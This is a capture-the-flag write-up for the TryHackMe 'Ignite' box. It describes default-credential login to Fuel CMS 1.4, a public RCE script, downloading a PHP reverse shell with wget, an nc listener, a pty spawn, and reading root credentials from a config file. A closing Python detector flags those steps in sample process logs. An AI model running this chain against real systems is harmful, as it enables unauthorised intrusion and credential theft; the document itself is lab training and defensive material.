Ignite — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Ignite — TryHackMe — Writeup. Check it out!
First, run nmap to see which ports are open on the machine.
nmap -A -T5 -v <ip>
Port 80 is open, so let's visit the website.
Now I know the website is running CMS Fuel version 1.4. This will be important when we search for an exploit.
Press Ctrl+U to view the page source and look for interesting information.
Now I have the admin login page and password. Go to http://<ip>/fuel/login and log in with the credentials admin:admin.
Now I'm in. I tried to upload a shell to the machine through this admin site, but it didn't work, so I will try another way. Let's search for a CMS exploit using searchsploit:
searchsploit CMS fuel
I see a Remote Code Execution exploit which matches our CMS version. So let's google this and download the python script from:
Execute the Python script and we can run commands on the target machine. Enter the command "pwd" to see which folder we are in.
We are in the website folder, which means that if we can upload a shell here, we can access the shell directly from our browser.
Let's start an HTTP server using Python's http.server module (if you are using Python 3) or SimpleHTTPServer (if you are using Python 2). cd to the folder that contains your PHP reverse shell and run one of these commands:
python3 -m http.server 9000 (python 3)
python -m SimpleHTTPServer 9000 (python 2)
Now let's download the shell onto the target machine using wget. Change the cmd in the python script like this:
*Remember that the host IP is your TryHackMe VPN IP, not your real IP. You can find your VPN IP by accessing 10.10.10.10.
Now use nc to open a listener:
nc -lvnp 4444
Run the script, then open this URL in your web browser:
http://<machine-ip>/php-reverse-shell.php
Now we have our shell! Let's explore and get the user.txt flag.
We need to get root to read the root.txt flag, which is placed in the /root folder.
You can find the root credential in /var/www/html/fuel/application/config/database.php
To su to root you need a TTY. Spawn one using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Then su root using the credential above.
cd to /root and cat the root.txt file.
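Seen from the defender's side, the steps above leave a recognisable trail of processes started by the web server account. The following is an added example, not part of the original writeup: a small detector run over constructed process events. The event layout, the account and process names (www-data, apache2) and the 192.0.2.10 address are assumptions.

```python
import re

# Constructed sample events as (user, parent process, command line). The tuple
# layout and the 192.0.2.10 address are assumptions made for this example.
SAMPLE_EVENTS = [
    ("www-data", "apache2", "sh -c pwd"),
    ("www-data", "sh", "wget http://192.0.2.10:9000/php-reverse-shell.php"),
    ("www-data", "sh", 'python -c import pty; pty.spawn("/bin/bash")'),
    ("www-data", "bash", "su root"),
    ("root", "cron", "run-parts /etc/cron.daily"),
    ("alice", "bash", "wget https://example.org/notes.txt"),
]

WEB_USERS = {"www-data", "apache", "nginx"}             # assumed service accounts
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}  # assumed server processes

# Each rule is (name, predicate over parent process and command line).
RULES = [
    ("shell spawned by web server",
     lambda parent, cmd: parent in WEB_PARENTS and re.match(r"(ba)?sh\b", cmd)),
    ("file download by web account",
     lambda parent, cmd: re.match(r"(wget|curl)\b", cmd)),
    ("pty allocation by web account",
     lambda parent, cmd: "pty.spawn" in cmd),
    ("su attempt by web account",
     lambda parent, cmd: re.match(r"su\b", cmd)),
]

def detect(events):
    """Return (event index, rule name) for every rule hit by a web account."""
    alerts = []
    for i, (user, parent, cmd) in enumerate(events):
        if user not in WEB_USERS:
            continue  # interactive users and root are out of scope here
        for name, rule in RULES:
            if rule(parent, cmd):
                alerts.append((i, name))
    return alerts

def chain_detected(alerts, min_stages=3):
    """Several distinct stages on one host are far stronger than a single hit."""
    return len({name for _, name in alerts}) >= min_stages

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for index, name in hits:
        print(f"event {index}: {name}: {SAMPLE_EVENTS[index][2]}")
    print("escalate:", chain_detected(hits))
```

In practice the same rules would be fed from auditd or EDR process telemetry; the ordinary wget run by alice and the cron job are deliberately not flagged.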
The end.
HAPPY HACKING